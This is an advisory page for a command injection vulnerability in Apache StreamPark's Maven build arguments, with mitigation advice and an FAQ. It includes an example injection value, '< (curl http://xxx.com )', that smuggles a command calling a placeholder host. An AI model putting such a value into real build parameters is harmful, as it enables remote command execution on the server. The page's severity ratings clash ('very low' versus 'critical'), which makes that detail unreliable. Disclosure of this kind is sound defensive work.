CVE-2023-52291: Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.
Background:
In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection,
Mitigation:
all users should upgrade to 2.1.4, The "<" operator will blocked。
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2023-52291?
CVE-2023-52291 has been rated as critical due to its potential for remote command execution.
How do I fix CVE-2023-52291?
To fix CVE-2023-52291, ensure you upgrade Apache StreamPark to version 2.1.4 or later.
Who is affected by CVE-2023-52291?
CVE-2023-52291 affects users of Apache StreamPark versions between 2.0.0 and 2.1.4.
What type of vulnerability is CVE-2023-52291?
CVE-2023-52291 is a remote command execution vulnerability due to insufficient input parameter validation.
What are the prerequisites for exploiting CVE-2023-52291?
An attacker must be logged into StreamPark to exploit CVE-2023-52291.